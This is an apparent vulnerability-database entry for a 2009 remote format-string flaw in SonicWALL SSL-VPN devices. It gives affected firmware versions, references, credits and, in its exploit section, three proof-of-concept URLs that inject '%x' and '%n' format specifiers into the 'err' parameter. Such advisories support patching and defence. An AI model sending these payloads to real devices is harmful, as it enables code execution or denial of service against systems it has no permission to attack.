Details of VAR-E-200905-0272

ID

VAR-E-200905-0272

EDB ID

33016

TITLE

SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33016

DESCRIPTION

SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 33016

AFFECTED PRODUCTS

vendor:	sonicwall	model:	ssl-vpn	scope:	-	version:	-	Trust: 1.0
vendor:	sonicwall	model:	ssl-vpn	scope:	eq	version:	40003.54	Trust: 0.3
vendor:	sonicwall	model:	ssl-vpn	scope:	eq	version:	20003.54	Trust: 0.3
vendor:	sonicwall	model:	ssl-vpn	scope:	eq	version:	2003.08	Trust: 0.3
vendor:	sonicwall	model:	ssl vpn	scope:	eq	version:	2002.1	Trust: 0.3
vendor:	sonicwall	model:	ssl-vpn	scope:	ne	version:	40003.55	Trust: 0.3
vendor:	sonicwall	model:	ssl-vpn	scope:	ne	version:	20003.55	Trust: 0.3
vendor:	sonicwall	model:	ssl-vpn	scope:	ne	version:	2003.09	Trust: 0.3

sources: BID: 35145 // EXPLOIT-DB: 33016

EXPLOIT

source: https://www.securityfocus.com/bid/35145/info

Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

Attackers may exploit this issue to run arbitrary code in the context of the affected application. Failed attempts may cause denial-of-service conditions.

The following are vulnerable:

SSL-VPN 200 firmware prior to 3.0.0.9
SSL-VPN 2000 firmware prior to 3.5.0.5
SSL-VPN 4000 firmware prior to 3.5.0.5

https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n

Trust: 1.0

sources: EXPLOIT-DB: 33016

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33016

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33016

TYPE

'cgi-bin/welcome/VirtualOffice' Remote Format String

Trust: 1.0

sources: EXPLOIT-DB: 33016

CREDITS

Patrick Webster

Trust: 0.6

sources: EXPLOIT-DB: 33016

EXTERNAL IDS

db:	BID	id:	35145	Trust: 1.9
db:	EXPLOIT-DB	id:	33016	Trust: 1.6
db:	EDBNET	id:	54514	Trust: 0.6

sources: BID: 35145 // EXPLOIT-DB: 33016 // EDBNET: 54514

REFERENCES

url:	https://www.securityfocus.com/bid/35145/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/33016/	Trust: 0.6
url:	http://www.aushack.com/200905-sonicwall.txt	Trust: 0.3
url:	http://www.sonicwall.com	Trust: 0.3

sources: BID: 35145 // EXPLOIT-DB: 33016 // EDBNET: 54514

SOURCES

db:	BID	id:	35145
db:	EXPLOIT-DB	id:	33016
db:	EDBNET	id:	54514

LAST UPDATE DATE

2022-07-27T09:13:09.819000+00:00

SOURCES UPDATE DATE

db:

BID

id:

35145

date:

2009-05-29T19:09:00

SOURCES RELEASE DATE

db:	BID	id:	35145	date:	2009-05-29T00:00:00
db:	EXPLOIT-DB	id:	33016	date:	2009-05-29T00:00:00
db:	EDBNET	id:	54514	date:	2009-05-29T00:00:00